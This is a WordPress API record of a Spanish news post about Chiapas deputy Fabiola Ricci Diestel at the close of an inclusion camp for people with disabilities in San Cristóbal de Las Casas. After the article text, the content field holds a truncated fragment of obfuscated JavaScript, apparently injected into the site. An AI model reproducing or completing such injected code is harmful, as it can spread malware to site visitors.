{"id":2174,"date":"2022-05-17T01:01:03","date_gmt":"2022-05-17T01:01:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2174"},"modified":"2022-05-17T01:01:04","modified_gmt":"2022-05-17T01:01:04","slug":"inclusion-social-una-realidad-en-chiapas-ricci-diestel","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2174","title":{"rendered":"Inclusi\u00f3n social, una realidad en Chiapas: Ricci Diestel"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"716\" data-id=\"2176\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0103-1024x716.jpg\" alt=\"\" class=\"wp-image-2176\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0103-1024x716.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0103-300x210.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0103-768x537.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0103.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"422\" data-id=\"2175\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0099-1024x422.jpg\" alt=\"\" class=\"wp-image-2175\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0099-1024x422.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0099-300x124.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0099-768x316.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220516-WA0099.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><br>\u2022 Se llev\u00f3 a cabo la capacitaci\u00f3n n\u00famero 320 a nivel nacional y segunda en San Crist\u00f3bal De las Casas, en materia de inclusi\u00f3n, dijo la legisladora.<br>San Crist\u00f3bal de Las Casas, 16 mayo de 2022.- Desde el Congreso del Estado de Chiapas, se sigue impulsando el tema de la inclusi\u00f3n social, afirm\u00f3 la diputada Fabiola Ricci Diestel, al participar en la clausura del Segundo Campamento \u201cVida Independiente M\u00e9xico-San Crist\u00f3bal\u201d.Cabe destacar que la diputada por MORENA ha mantenido reuniones con diversos grupos, con el objetivo de unificar criterios a favor de todos los sectores del estado de Chiapas.La legisladora anot\u00f3 que desde la m\u00e1xima tribuna eleva su voz para abrir las puertas y sensibilizar a la sociedad en estos temas, pues todos somos chiapanecos y la unidad -recalc\u00f3- es la base para lograr un mejor desarrollo y bienestar de todos los ciudadanos de esta entidad.Ricci Diestel, se dijo convencida de la inclusi\u00f3n y por esa raz\u00f3n -agreg\u00f3- estar\u00e1n cre\u00e1ndose iniciativas de ley que permitan a todos los sectores ser tomados en cuenta, \u201chemos hecho los exhortos y esperamos que el presidente municipal de San Crist\u00f3bal de las Casas, cree la direcci\u00f3n para personas con Discapacidad, para que se les de la atenci\u00f3n, lo hicimos ya hace unos meses con apoyo de la agrupaci\u00f3n: \u201cSi Podemos\u201d.Al asistir como invitada a la clausura del Segundo Campamento \u201cVida Independiente M\u00e9xico-San Crist\u00f3bal\u201d la diputada chiapaneca anex\u00f3 que son momentos precisos para trabajar y lograr esos resultados que la sociedad espera no solo del Congreso, sino de la colectividad misma.Es de mencionar que en este campamento se llev\u00f3 a cabo la capacitaci\u00f3n, n\u00famero 320 a nivel nacional y segundo en San Crist\u00f3bal, refrend\u00f3 su compromiso por una inclusi\u00f3n sustantiva, \u201cno vamos a permitir que se viole los derechos humanos de las personas en cualquier grupo de la sociedad.Ricci Diestel hizo un reconocimiento al presidente nacional de la Asociaci\u00f3n Civil \u201cVida Independiente\u201d Santiago Vel\u00e1zquez Duarte, al vicepresidente en San Crist\u00f3bal \u00c1ngel Rom\u00e1n y al presidente de la A.C \u201cSi Podemos\u201d, Homer Sevilla, por el trabajo que han hecho por estas personas.Es de mencionar que el campamento se llev\u00f3 a cabo del 11 al 15 de mayo en las instalaciones de La Albarrada, en donde se cont\u00f3 con la presencia de personas de Sonora, Nuevo Le\u00f3n, Ciudad de M\u00e9xico, Oaxaca, Veracruz, Tabasco, Veracruz, y de Centroam\u00e9rica Guatemala, Nicaragua y Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Se llev\u00f3 a cabo la capacitaci\u00f3n n\u00famero 320 a nivel nacional y segunda en San Crist\u00f3bal De las Casas, en materia de inclusi\u00f3n, dijo la legisladora.San Crist\u00f3bal de Las Casas, 16 mayo de 2022.- Desde el Congreso del Estado de Chiapas, se sigue impulsando el tema de la inclusi\u00f3n social, afirm\u00f3 la diputada Fabiola &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,6],"tags":[],"class_list":["post-2174","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-portada","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2174"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2174\/revisions"}],"predecessor-version":[{"id":2177,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2174\/revisions\/2177"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2175"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2174"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2174"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}